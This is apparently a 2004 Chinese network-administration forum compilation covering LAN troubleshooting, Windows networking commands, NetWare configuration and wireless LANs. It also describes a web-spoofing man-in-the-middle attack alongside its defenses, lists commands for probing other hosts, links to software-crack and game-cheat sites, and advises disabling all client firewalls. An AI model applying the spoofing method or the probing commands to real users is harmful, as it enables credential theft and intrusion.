    问：局域网采用Windows XP的ICS共享Internet连接。主机装有瑞星杀毒软件2004版及瑞星防火墙，Internet 连接防火墙也开启。网内计算机通过主机共享上网，操作系统为Win/98/2000/XP，装有瑞星杀毒软件2004版及瑞星防火墙，并开启了系统Internet防火墙。主机IP为192.168.0.1 其余机器为192.168.0.x，工作组相同为MSHOME，子网掩码也相同为255.255.255.0。虽然ICS主机能正常访问Web网站，但局域网中的其他计算机却不行。原因何在?
    答：通过以下方式可以排除故障：
    第一，在WinXP ICS主机上，只能启用一款网络防火墙，不能同时启用瑞星防火墙和Internet连接防火墙。试着关闭Internet 连接防火墙。
    第二，局域网客户端不能启用防火墙，无论是瑞星防火墙还是Internet 连接防火墙，否则，将导致资源共享和Internet连接共享失败。试着关闭所有的防火墙，问题也许就解决了。
    欢迎大家贴上自己的维护经验，让我们共同进步！
--------------------------------------------------------------------------------
作者: admi　　时间: 2004-2-15 15:04　　 标题: 网络维护专题

DING
--------------------------------------------------------------------------------
作者: yuxiao521　　时间: 2004-2-15 15:18　　 标题: 网络维护专题

[这个贴子最后由yuxiao521在 2004/02/15 03:38pm 第 1 次编辑]

    什么原因引起只能单方向Ping通呢?
    当网络出现问题时，我们最常用的测试工具就是“Ping”命令了。但有时候我们会碰到单方向Ping通的现象，例如通过HUB或一根交叉线连接的在同一个局域网内的电脑A、 B，在检查它们之间的网络连通性时，发现从主机A Ping 主机B正常而从主机B Ping 主机A时，出现“超时无应答”错误。为什么呢?
    要知道这其中的奥秘，我们有必要来看看Ping命令的工作过程到底是怎么样的。
    假定主机A的IP地址是192.168.1.1，主机B的IP地址是192.168.1.2，都在同一子网内，则当你在主机A上运行“Ping 192.168.1.2”后，都发生了些什么呢?
    首先，Ping命令会构建一个固定格式的ICMP请求数据包，然后由ICMP协议将这个数据包连同地址“192.168.1.2”一起交给IP层协议（和ICMP一样，实际上是一组后台运行的进程），IP层协议将以地址“192.168.1.2”作为目的地址，本机IP地址作为源地址，加上一些其他的控制信息，构建一个IP数据包，并在一个映射表中查找出IP地址192.168.1.2所对应的物理地址（也叫MAC地址，熟悉网卡配置的朋友不会陌生，这是数据链路层协议构建数据链路层的传输单元——帧所必需的），一并交给数据链路层。后者构建一个数据帧，目的地址是IP层传过来的物理地址，源地址则是本机的物理地址，还要附加上一些控制信息，依据以太网的介质访问规则，将它们传送出去。
    主机B收到这个数据帧后，先检查它的目的地址，并和本机的物理地址对比，如符合，则接收；否则丢弃。接收后检查该数据帧，将IP数据包从帧中提取出来，交给本机的IP层协议。同样，IP层检查后，将有用的信息提取后交给ICMP协议，后者处理后，马上构建一个ICMP应答包，发送给主机A，其过程和主机A发送ICMP请求包到主机B一模一样。
    从Ping的工作过程，我们可以知道，主机A收到了主机B的一个应答包，说明两台主机之间的去、回通路均正常。也就是说，无论从主机A到主机B，还是从主机B到主机A，都是正常的。那么，是什么原因引起只能单方向Ping通的呢?
    一、安装了个人防火墙
    在共享上网的机器中，出于安全考虑，大部分作为服务器的主机都安装了个人防火墙软件，而其他作为客户机的机器则一般不安装。几乎所有的个人防火墙软件，默认情况下是不允许其他机器Ping本机的。一般的做法是将来自外部的ICMP请求报文滤掉，但它却对本机出去的ICMP请求报文，以及来自外部的ICMP应答报文不加任何限制。这样，从本机Ping其他机器时，如果网络正常，就没有问题。但如果从其他机器Ping这台机器，即使网络一切正常，也会出现“超时无应答”的错误。
    大部分的单方向Ping通现象源于此。解决的办法也很简单，根据你自己所用的不同类型的防火墙，调整相应的设置即可。
    二、错误设置IP地址
    正常情况下，一台主机应该有一个网卡，一个IP地址，或多个网卡，多个IP地址（这些地址一定要处于不同的IP子网）。但对于在公共场所使用的电脑，特别是网吧，人多手杂，其中不泛有“探索者”。曾有一次两台电脑也出现了这种单方向Ping通的情况，经过仔细检查，发现其中一台电脑的“拨号网络适配器”（相当于一块软网卡）的TCP/IP设置中，设置了一个与网卡IP地址处于同一子网的IP地址，这样，在IP层协议看来，这台主机就有两个不同的接口处于同一网段内。当从这台主机Ping其他的机器时，会存在这样的问题：
    （1）主机不知道将数据包发到哪个网络接口，因为有两个网络接口都连接在同一网段；
    （2）主机不知道用哪个地址作为数据包的源地址。因此，从这台主机去Ping其他机器，IP层协议会无法处理，超时后，Ping 就会给出一个“超时无应答”的错误信息提示。但从其他主机Ping这台主机时，请求包从特定的网卡来，ICMP只须简单地将目的、源地址互换，并更改一些标志即可，ICMP应答包能顺利发出，其他主机也就能成功Ping通这台机器了。


网络最经典命令行安全工作者的必杀技

《一键清理系统垃圾》

网络最经典命令行安全工作者的必杀技

1.最基本，最常用的，测试物理网络的
    ping 192.168.0.8 －t ，参数－t是等待用户去中断测试
2.查看DNS、IP、Mac等
    A.Win98：winipcfg
    B.Win2000以上：Ipconfig/all
    C.NSLOOKUP：如查看河北的DNS
    C:\>nslookup
    Default Server: ns.hesjptt.net.cn
    Address: 202.99.160.68
    >server 202.99.41.2 则将DNS改为了41.2
    > pop.pcpop.com
    Server: ns.hesjptt.net.cn
    Address: 202.99.160.68
    Non-authoritative answer:
    Name: pop.pcpop.com
    Address: 202.99.160.212
    3.网络信使
    Net send 计算机名/IP　* (广播) 传送内容，注意不能跨网段
    net stop messenger 停止信使服务，也可以在面板－服务修改
    net start messenger 开始信使服务
    4.探测对方对方计算机名，所在的组、域及当前用户名 （追捕的工作原理）
    ping －a IP －t ，只显示NetBios名
    nbtstat -a 192.168.10.146 比较全的
    5.netstat -a 显示出你的计算机当前所开放的所有端口
    netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等
    6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址
    arp -a
7.在代理服务器端
    捆绑IP和MAC地址，解决局域网内盗用IP！：
    ARP －s 192.168.10.59 00 －50－ff－6c－08－75
    解除网卡的IP与MAC地址的绑定：
    arp -d 网卡IP
    8.在网络邻居上隐藏你的计算机
    net config server /hidden:yes
    net config server /hidden:no 则为开启
    9.几个net命令
    A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。
    比如：查看这个IP上的共享资源，就可以
    C:\>net view 192.168.10.8
    在 192.168.10.8 的共享资源
    资源共享名 类型 用途 注释
    --------------------------------------
    网站服务 Disk
    命令成功完成。
    B.查看计算机上的用户帐号列表 net user
    C.查看网络链接 net use
    例如：net use z: \192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
    D.记录链接 net session
    例如: C:\>net session
    计算机 用户名 客户类型 打开空闲时间
    -------------------------------------------------------------------------------
    \192.168.10.110 ROME Windows 2000 2195 0 00:03:12
    \192.168.10.51 ROME Windows 2000 2195 0 00:00:39
    命令成功完成。
10.路由跟踪命令
    A.tracert pop.pcpop.com
    B.pathping pop.pcpop.com 除了显示路由外，还提供325S的分析，计算丢失包的％
    11.关于共享安全的几个命令
    A.查看你机器的共享资源 net share
    B.手工删除共享（可以编个bat文件，开机自运行，把共享都删了！）
    net share c&#36; /d
    net share d&#36; /d
    net share ipc&#36; /d
    net share admin&#36; /d
    注意&#36;后有空格。
    C.增加一个共享：
    c:\net share mymovie=e:\downloads\movie /users:1
    mymovie 共享成功。
    同时限制链接用户数为1人。
    12.在DOS行下设置静态IP
    A.设置静态IP
    CMD
    netsh
    netsh>int
    interface>ip
    interface ip>set add "本地链接" static IP地址 mask gateway
    B.查看IP设置
    interface ip>show address
13.Arp
    显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表，它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用，则 arp 命令将显示帮助信息。
    语法
    arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s　 InetAddr EtherAddr [IfaceAddr]]
    参数
    -a [InetAddr] [-N IfaceAddr]
    显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项，请使用带有 InetAddr 参数的 arp -a，此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表，请使用 -N IfaceAddr 参数，此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
    -g [InetAddr] [-N IfaceAddr]
    与 -a 相同。
    -d InetAddr [IfaceAddr]
    删除指定的 IP 地址项，此处的 InetAddr 代表 IP 地址。对于指定的接口，要删除表中的某项，请使用 IfaceAddr 参数，此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项，请使用星号 (*) 通配符代替 InetAddr。
    -s InetAddr EtherAddr [IfaceAddr]
    向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项，请使用 IfaceAddr 参数，此处的 IfaceAddr 代表分配给该接口的 IP 地址。
    /?
    在命令提示符显示帮助。
    注释
    InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
    物理地址 EtherAddr 由六个字节组成，这些字节用十六进制记数法表示并且用连字符隔开（比如，00-AA-00-4F-2A-9C）。
    通过 -s 参数添加的项属于静态项，它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动，这些项会被删除。要创建永久的静态 ARP 缓存项，请在批处理文件中使用适当的 arp 命令并通过“计划任务程序”在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时，该命令才可用。
    范例
    要显示所有接口的 ARP 缓存表，可键入：
    arp -a
    对于指派的 IP 地址为 10.0.0.99 的接口，要显示其 ARP 缓存表，可键入：
    arp -a -N 10.0.0.99
    要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项，可键入：
    arp -s 10.0.0.80 00-AA-00-4F-2A-9C
    14.At
    计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在“计划”服务运行时使用。如果在没有参数的情况下使用，则 at 列出已计划的命令。
    语法
    at [\ComputerName] [{[ID] [/delete]　/delete [/yes]}]
    at [[\ComputerName] hours:minutes [/interactive] [{/every:date[,...]　/next:date[,...]}] command]
    参数
     \computername
    指定远程计算机。如果省略该参数，则 at 计划本地计算机上的命令和程序。
    ID
    指定指派给已计划命令的识别码。
    /delete
    取消已计划的命令。如果省略了 ID，则计算机中所有已计划的命令将被取消。
    /yes
    删除已计划的事件时，对来自系统的所有询问都回答“是”。
    hours:minutes
    指定命令运行的时间。该时间用 24 小时制（即从 00:00 [午夜] 到 23:59）的 小时: 分钟格式表示。
    /interactive
    对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。
    /every:
    在每个星期或月的指定日期（例如，每个星期四，或每月的第三天）运行 command 命令。
    date
    指定运行命令的日期。可以指定一周的某日或多日（即，键入 M、T、W、Th、F、S、Su）或一个月中的某日或多日（即，键入从 1 到31 之间的数字）。用逗号分隔多个日期项。如果省略了 date，则 at 使用该月的当前日。
    /next:
    在下一个指定日期（比如，下一个星期四）到来时运行 command。
    command
    指定要运行的 Windows 命令、程序（.exe 或 .com 文件）或批处理程序（.bat 或 .cmd 文件）。当命令需要路径作为参数时，请使用绝对路径，也就是从驱动器号开始的整个路径。如果命令在远程计算机上，请指定服务器和共享名的通用命名协定 (UNC) 符号，而不是远程驱动器号。
    /?
    在命令提示符显示帮助。
    注释
    Schtasks 是功能更为强大的超集命令行计划工具，它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务，都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息，请参阅“相关主题”。
    使用 at
    使用 at 命令时，要求您必须是本地 Administrators 组的成员。
********************************************************************************

--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


网上邻居”故障的轻松排除

《一键清理系统垃圾》

网上邻居”故障的轻松排除

    经常有朋友向我求救，说打开网上邻居时有错误，提示不能浏览网络。正如微软所说，原因可能有很多。

    下面是解决此问题的步骤。

    1.确保硬件没有问题

    有些人虽然打开网上邻居时有错误，提示不能浏览网络，但是却能够与局域网的其他计算机玩网络游戏。这就表明你的硬件没有问题。再者，用ping命令，ping本地的IP地址或计算机名。如果能ping通，也说明你的硬件没有问题。

    2.网络配置

    若是Windows 98系列操作系统，强烈建议宿舍、家庭局域网在网络组件中安装5个网络组件，缺一不可，多则累赘。第一个是Microsoft网络用户，第二个是正确安装网卡驱程，第三个和第四个是IPX协议和TCP/IP协议，最后一个是Microsoft网络文件共享。若是Windows 2000、XP操作系统，也只需要做类似设置即可。

    3.TCP/IP里面的设置

    保证局域网里面的计算机处于同一网段上。一般把IP地址设为192.168.1.X，子网掩码255.255.255.0，就可以了。

    4.不要更改其他网络组件的默认设置

    总结：提示读者注意的是，一定要注视第2点所说的安装网络文件共享这个组件。只要局域网中有一台计算机没有装这个东东，出现无法浏览网络的几率就大大提升了。

    说到最后，还要加上一句读者不希望看到话：即使是硬件没问题，软件设置没有问题，在对等局域网中出现无法浏览网上邻居还是不可避免的现象！！这涉及到计算机列表保存在主控服务器上的知识，不是一两句话能够说清楚的。我们只要做到上面几点，就很少会出现无法浏览网上邻居的情况。若真要解决此问题，还有两个方法：

    第一：常开一台运行Nt server的计算机。我想一般的局域网用户是不会这样做吧。

    第二：另投明主，下载一个专为局域网共享文件的软件，网上到处都有。

    希望这篇文章能够解决长期困扰大家的问题。


网站浏览安全细细谈

《一键清理系统垃圾》

网站浏览安全细细谈

    网站浏览安全细细谈

   Web欺骗是一种具有相当危险性且不易被察觉的黑客攻击手法，一般意义上讲，也就是针对浏览网页的个人用户进行欺骗，非法获取或者破坏个人用户的隐私和数据资料。它危及到普通Web浏览器用户，包括Netscape Navigator用户和Microsoft Internet Explorer用户。

  一、欺骗手法
  攻击者如果想进行Web欺骗就，离不开Web服务器的支持，所以绝大多数情况下，他们在受攻击者和Web服务器之间设立起攻击者自己的Web服务器，这种攻击种类在安全问题中称为“来自中间的攻击”。用户浏览器和真正的服务器之间的数据交换并非是直接的，会被攻击者的服务器截获并处理。利用中间服务器进行行骗，就像罪犯驾驶着盗窃来的警车去“执行公务”，因此相当隐蔽。对于被攻击用户，几乎是不知不觉的，因为他们仍然可以自由登录、链接到该网站的所有页面。对于攻击者而言，在偷偷监视截取信息的同时，也能以受攻击者的名义发送数据到真正的Web服务器，包括以服务器的名义发送数据给受攻击者。
    当用户访问某个这样的站点并进行合理的活动时，可能面对的并不是真实的目标网站，而只是一个攻击者营造的真实站点的翻版，或者说虚拟的镜像，它们之间如此雷同并不会让我们感到潜在的威胁，而此时你的所有注册信息和登录账号口令，甚至一切活动，就源源不断地从这个镜像的入口进入到攻击者控制着的Web服务器。攻击者可以监视、记录、修改所有信息并进行破坏活动。
    例如，在线填写表单时，填入表单的用户密码账号等信息将被获取，从而泄密。在访问网上银行时，你可能根据你所见的银行Web页面，从该行的账户中提取或存入一定数量的存款。因为你相信你所访问的Web页面就是你所需要的银行的Web页面。无论是页面的外观布局、图片标识、链接地址，文字内容还是其它一些相关内容，都让你感到非常熟悉，没有理由不相信。但是，你确实是处在攻击者建立的伪造页面中。

    二、实施过程

    1.诱使用户进入攻击者控制的中间服务器
    攻击者在Web服务器需要提供关于某个Web站点的错误Web页面时，他只需要在自己的服务器上建立一个该站点的拷贝，而不必存储整个真实服务器站点的内容，然后改写这个拷贝中所有的链接获得真实服务器上的所有页面镜像。
    首先，攻击者改写拷贝中所有链接地址(URL)，使它们指向了攻击者的服务器而不是真正的服务器。假定攻击者所处的Web服务器是www.???.com，攻击者通过在所有链接前增加www.???.com来改写URL。例如，abc.efg.com将变为www.???.com/ abc.efg.com。当用户点击改写过的abc.efg.com，进入的确是：www.???.com，然后由该中间服务器向abc.efg.com发出请求并获得真正的文档，然后改写文档中的所有链接，最后经http://www.???.com返回给用户的浏览器。
    可见，用户通过改写后的链接登录目标站点时，实际上先是经由中间服务器，然后才向目标服务器请求文档，而目标服务器返回的文档必须经由中间服务器，改写所有链接后才传回给用户浏览器。很显然，修改过的文档中的所有URL都指向了www.???.com，当用户点击任何一个链接都会直接进入这个页面，而不会直接进入真正的网站。只要用户由此进入其它网页，那么他们是永远不会摆脱掉受攻击的可能的。
    伪造网页中的表单，如果被填写就构成了表单欺骗，同样神不知鬼不觉。表单的确定信息被编码到链接地址行中，内容会以HTML形式返回。前面讲到，所有页面的URL都已经被改写，那么表单欺骗将是很自然的事情了。
    当受攻击者提交表单后，所提交的数据进入了攻击者的服务器。攻击者的服务器能够观察，甚至是修改所提交的数据。同样地，在得到真正的服务器返回信息后，攻击者将向受攻击者返回信息。
   2.发布欺骗页
    Web攻击者必须设法引诱用户去访问并点击他设定的Web陷阱，黑客往往使用下面几种方法：
    (1)把错误的Web链接放到一个热门Web站点上；
    (2)如果受攻击者使用基于HTML的邮件，通过电子邮件发送伪造的Web页面给用户；
    (3)创建错误的Web索引，指示给搜索引擎；
    (4)在网络公众场合，如BBS、OICQ，论坛或聊天室散播包含错误链接的网站网址。
    三、如何防范
    1.对于个人用户
    (1)查看源文件
    攻击者并不是不留丝毫痕迹，HTML源文件会使这种欺骗暴露无遗。通过点击鼠标右键或者在浏览器中点击菜单“查看”“源文件”，用户可以阅读当前的HTML源文件。可以发现当前页URL地址的信息并同网页上的真实地址相对照，你能够发现被改写的URL，因此可以觉察到危险。
    例如，你收到一封263邮局的HTML格式信件，查看源文件，根据前面的介绍，很容易发现是否有伪造的痕迹。
    因此，建议不要通过来历不明的Web站点登录安全站点，如通过某个个人站点登录263服务器。对于搜索引擎或从其它场合得到的站点，应仔细甄别，防止受骗。
    (2)禁止浏览器中的JavaScript功能
    各类攻击者的服务器，页面都包含大量的JavaScript脚本以实现其不可告人的目的，此时可将JavaScript功能禁止或者改为使用前提示。
    方法是：在IE浏览器中，点击菜单“工具”“Internet选项”，切换到“安全”选项卡“自定义级别”，弹出“安全设置”框，在里面对JavaScript功能选择“禁止”。
    (3)确保浏览器的连接提示状态可见，它会给你提供当前位置的各类信息；　　(4)仔细观察你所点击的URL链接，一般会在状态栏中或地址栏得到正确的显示。
    2.对于服务器
    个人用户对于服务器端是无能为力的，此处我们仅给大家提供一些服务器端安全预防措施，希望会给个人站点的管理者一些有益的提示。
    Web服务器端安全预防措施：限制在Web服务器开账户，定期删除一些久不登录的用户；对在Web服务器上开的账户，对注册用户口令长度作出要求并提示定期更改，防止被盗用造成隐患；尽量使Ftp, Mail等服务器与Web服务器分开；定期查看服务器中的日志文件，分析一切可疑事件；设置好Web服务器上系统文件的权限和属性；不要把Web服务器与FTP目录指在同一目录；必要时限制访问用户IP或DNS；如果采用CGI程序，应放在独立于HTML存放目录之外的CGI-BIN下；在用C来编写CGI程序时尽量少用popen()、system()和所有涉及/bin/sh的shell命令。
    此外，编译语言(CGI、PERL等)比解释语言(PHP、JSP等)更安全。至于许多Web服务器本身都存在的一些安全漏洞，不是本文探讨的范畴，有兴趣的读者可参阅相关资料。


35个经典小游戏（下载）

《一键清理系统垃圾》

35个经典小游戏（下载）

http://www.fjnt.com/soft/692.htm

工具软件：
http://soft.ly-web.com/sort.asp?CateID=11 网吧软件
http://www.sq88.com/down/SoftView.asp?SoftID=780　美萍
http://coolker.com/　酷网科技
http://www.fjnt.com/sort/index.htm　福建网吧联盟
http://www.crackbest.com/bbs　白菜乐园破解论坛
http://www.cy07.com　网吧破解
http://home.enet.com.cn/　硅谷动力
http://www.crsky.net　 霏风软件
http://www.yygame.com/down/index.htm 冲浪软件
http://www.superdown.com/　 软件万花筒
http://www.365mm.com　　满满下载
http://www.ilovedown.com/　我爱下载
http://downxp.com　 世纪软件园
http://www.qz158.com/　 泉州软件园
http://soft.netnest.com.cn　 软件仓库
http://soft.chinesejia.net/index.asp 中文之家
http://www.pchome.net/　电脑之家
http://www.hanzify.org/　汉化新世纪
http://www.caiqing.net/　软件新干线
http://www.hzmian.net/志勉下载
http://www.fixdown.com/fixdown/default.html　全方位下载
http://www.jetdown.com　　杰特下载
http://www.xicn.net　　　喜满你
http://soft.km169.net　　 软件频道
http://www.cnyou.com/　　 华游软件网
http://www.skycn.com/index.html　 天空软件站
http://www.newhua.com/　　 华军软件园
http://www.pconline.com.cn/　太平洋电脑网
http://www.souxin.com/　 流媒体下载软件
http://www.mydrivers.com/　驱动之家
http://download.it168.com/　168驱动
http://www..10178.com/
http://www.51513.com/

音乐：
http://www.99music.net/　久久在线音乐
http://www.musicpow.com/　 MP3下载论坛
http://www.qhua.com　MP3下载
http://music.h444.com/　mp3下载
http://www.chinamp3.com mp3下载
http://www.sogua.com mp3下载

硬件网页：
http://www.zgctv.com/　　中关村硬件
http://www.52hardware.com/　　52硬件
http://www.21wx.net/　 中国维修站

游戏专区：
www.wg999.com
www.wg999.com.cn　外挂下载
http://www.d186.com　外挂,游戏网
http://china-soul.net/article/index.asp?classid=6&Nclassid=12　CS相关软件下载
http://www.player.com.cn/bbs　 CS1.6网站
http://bbs.91play.com/NowBoard.aspx 游戏论坛
http://soft.nc.jx.cn　暗黑破坏神下载
http://sz1001.net　街机游戏下载
http://www.qznetwork.com/　强者网络
http://www.bwfw.com/index.htm　反恐作弊器
http://17173.com　网络游戏下载网
http://down.52pk.net　 游戏下载

推荐：
http://www.frontfree.net里的文档中心。（强烈推荐！！！！！！！！！！！）
简明x86汇编语言教程

雅虎的分类
首页 > 区域 > 国家与地区 > 中国大陆 > 电脑与因特网 > 程序设计语言 > 汇编语言

http://wlbookwl.myrice.com/asm.htm
编程先锋-汇编编程类书籍下载

tonet.myrice.com/zwjs/jywzjjs
  实用，有案例。
http://www.ddhome.net/network/lan/index.asp
多、全。理论多
www.landiy.net/
网站！！
http://www.pconline.com.cn/pcedu/soft/lan/jywzj/
网络学院
http://www.pconline.com.cn/pcedu/soft/lan/jywzj/10309/215870_1.html
网络中双绞线接线的方法和策略
http://www.cnsmart.net/sysi/sjxljie1.htm
完全搞定双绞线的多种连接方式
http://www.cnsmart.net/sysi/rj45zz1.htm
RJ-45插头的打线标准与制作

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
中国网盟　www.51758.com 论坛！
神州网盟 www.8658.net　教程多
天下网盟 www.txwm.com
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

打字教程－www.typefree.com.cn


为NetWare服务器添加内存和硬盘

《一键清理系统垃圾》

为NetWare服务器添加内存和硬盘

对用惯了视窗系列软件的用户来说，NetWare网络操作系统别具特色。本人通过给一台NetWare服务器添加内存和硬盘，体会到了这一点。该服务器的原配置是PⅡ 400、64MB内存、4.3GB硬盘，准备给它添加128MB内存及18GB硬盘。

将买回的配件安装到服务器上，然后启动NetWare服务器。在启动过程中，BIOS显示新内存及新硬盘。但进入NetWare后，不能使用新添加的内存及硬盘。对于不能使用新添加的硬盘比较好理解，因为新硬盘还没有格式化；但对于不能使用新添加的内存可能要怀疑。然而事实如此，你若不信，可在NetWare服务器的主控台上，打入Memory命令试验。

为使新添加的内存生效，需做以下工作：

在NetWare服务器的主控台上，使用Register memory命令注册内存。该命令的语法为：

Register memory 新增内存起始地址（用十六进制表示） 新增内存容量（用十六进制表示）

在本例中，原配置为64MB内存，用十六进制表示为4000000，所以该新增内存的起始地址为4000000H，新增128MB内存，用十六进制表示为8000000H。所以使用以下命令参数注册新添加的内存：

Register memory 4000000 8000000

系统提示：“Memory was successfully added.”。可以再用Memory命令验证当前内存是否为192MB。

为了免除系统每次启动后都需敲入该命令，可将该命令加到NetWare的自动执行批命令Autoexec.ncf中的Mount all命令之后。

产生这一问题的原因是NetWare 4.11版不能自动识别由多个内存条组成、总容量大于16MB的插在非第一个内存插槽的内存条，虽然计算机硬件系统已识别出所有的内存。

为使新添加的硬盘生效，需做以下工作：

在NetWare服务器的主控台上，使用Install.nlm模块按选单提示对新添加的硬盘设置NetWare分区及NetWare卷。

通过映射及设置相应的权限，用户就可以使用新添加的磁盘卷了。

返回


为服务器添加多块网卡

《一键清理系统垃圾》

为服务器添加多块网卡

    最近，我校的Novell网络教室由原来的一间增加到了两间，还添加了几十台工作站。机器类型分别为386/25、486/40、586/233。原来一网络教室时，服务器上只装一块网卡，所有工作站采用总线结构上网，速度较慢，偶尔还有故障。如今，工作站增加几十台，仍用一块网卡上网，速度就非常慢，而且386、486机还经常上不了网，使教学受到严重影响。此外，如果上网时某台工作站出了故障，所有的工作站都受其影响，不能工作。
    为了解决这问题，我尝试在服务器上加多块网卡，终于解决了问题，在服务器上装上了三块网卡，让386、486、586机各接一块网卡上网。更改后的服务器不但工作稳定，工作站上网速度大幅度提高，而且若有工作站出现故障，只会影响与该工作站共用一块网卡的那些工作站，使用其它网卡的工作站却不受影响。下面介绍如何在服务器上安装多块网卡的具体步骤。

    网卡的安装与设置

    准备好两块以上要安装的网卡（型号最好相同，不同亦可，但必须与NE2000兼容），先把一块网卡插入服务器中，然后打开服务器，在DOS状态下运行随卡所配的网卡诊断程序Diag9008.exe，在出现的对话框中，诊断程序会告诉我们网卡的默认I/O地址为300H，中断INT=3H。选择配置网卡选项，把该网卡的I/O地址改为340H，中断改为INT=5H，然后保存配置，退回到DOS状态，关机。
    把第两块网卡插入服务器，重新开机，仿照上面的方法，把第二块网卡的I/O地址改为320H，中断改为INT=4H，保存配置，退回到DOS并关机。
    最后把第三块网卡插入到服务器，运行诊断程序后，诊断程序会告诉我们，服务器上共有三块网卡，且第三块网卡的I/O地址为300H，中断INT=3H（这是网卡的默认值，不用更改），保存配置并退回到DOS系统，网卡即安装成功。

    网络操作系统NetWare的配置

    网卡安装好后，还要在NetWare系统中把网卡的驱动程序调入才能使用，具体做法是：启动服务器，在出现冒号“：”提示符时执行load install命令，选择System Options选项，再选择Edit Autoexec.ncf选项，把Autoexec.ncf文件的内容改为：
    file server name LZEZ
    IPX internal net 1
    Load NE2000 Port=300 Int=3 Frame=ETHERNET_802.3
    Bind IPX to NE2000 net=3
    Load NE2000 Port=320 Int=4 Frame=ETHERNET_802.3
    Bind IPX to NE2000 net=4
    Load NE2000 Port=340 Int=5 Frame=ETHERNET_802.3
    Bind IPX to NE2000 net=5
    Load monitor
    然后存盘退出系统。

    网卡与网络操作系统的连接

    经过以上两个步骤，我们就可以按照新的配置上网了。具体做法为：分别把各种机型的工作站连接到不同的网卡上，启动服务器。在启动过程中，系统会出现下面的信息：
    Several boards are using the NE2000 LAN driver
    1. NetWare NE2000 v3.11 (910131) using I/O Port 300h to 31Fh,Interrupt 3h
    Frame type:ETHERNET_802.3
    2.NetWare NE2000 v3.11 (910131) using I/O Port 320h to 33Fh,Interrupt 4h
    Frame type:ETHERNET_802.3
    Select board to bind:
    意思是：服务器中有若干块网卡正在使用NE2000局域网的驱动程序，并列出了每块网卡的I/O地址及所使用的中断号，我们要选择连接几块网卡。这时应在Select board to bind:后输入数字2，然后回车服务器即可启动成功。
    若有三块网卡，在上面输入数字2并回车后，会增加一条信息：
    3.NetWare NE2000 v3.11 (910131) using I/O Port 300h to 35Fh,Interrupt 5h
    Frame type:ETHERNET_802.3
    Select board to bind:
    这时输入3，然后回车即可。
    说明：以上操作环境为服务器：CPU: Intel 586/233 MMX，内存16M，硬盘4.3G网络操作系统：Novell NetWare 3.11（250用户）；网卡接口：BNC接口。

返回


无线局域网的实际应用

《一键清理系统垃圾》

无线局域网的实际应用

    人们生活在“移动”的世界中，越来越多的移动产品的出现，标志着人们对快捷数据访问的需求在不断增加。近年来计算机局域网得到了很大的发展与普及，局域网已成为提高工作效率及生产率不可缺少的工具。通过无线局域网可以实现许多新的应用，这表明无线局域网的时代已经来临。

    ■无线局域网的优势
    无线局域网在人们的印象中是价格昂贵的，但实际上，在购买时不能只考虑设备的价格，因为无线局域网可以在其它方面降低成本。根据无线局域网协会的调查表明，无线局域网可极大地提高经济效益，提高生产率48%，提高企业效率6%，改善收益与利润6%，降低成本40%。使用无线局域网不仅可以减少对布线的需求和与布线相关的一些开支，还可以为用户提供灵活性更高、移动性更强的信息获取方法。

    ■无线局域网的结构
    对于不同局域网的应用环境与需求，无线局域网可采取不同的网络结构来实现互连。

    网桥连接型：不同的局域网之间互连时，由于物理上的原因，若采取有线方式不方便，则可利用无线网桥的方式实现二者的点对点连接，无线网桥不仅提供二者之间的物理与数据链路层的连接，还为两个网的用户提供较高层的路由与协议转换。

    基站接入型：当采用移动蜂窝通信网接入方式组建无线局域网时，各站点之间的通信是通过基站接入、数据交换方式来实现互连的。各移动站不仅可以通过交换中心自行组网，还可以通过广域网与远地站点组建自己的工作网络。

    HUB接入型：利用无线Hub可以组建星型结构的无线局域网，具有与有线Hub组网方式相类似的优点。在该结构基础上的WLAN，可采用类似于交换型以太网的工作方式，要求Hub具有简单的网内交换功能。

    无中心结构：要求网中任意两个站点均可直接通信。此结构的无线局域网一般使用公用广播信道，MAC层采用CSMA类型的多址接入协议。

    无线局域网可以在普通局域网基础上通过无线Hub、无线接入站（AP）、无线网桥、无线Modem及无线网卡等来实现，其中以无线网卡最为普遍，使用最多。

    无线局域网的关键技术，除了红外传输技术、扩频技术、网同步技术外还有一些其它技术，如：调制技术、加解扰技术、无线分集接收技术、功率控制技术和节能技术。

    ■无线局域网的具体实现
    方案一

    图1 无线局域网的结构

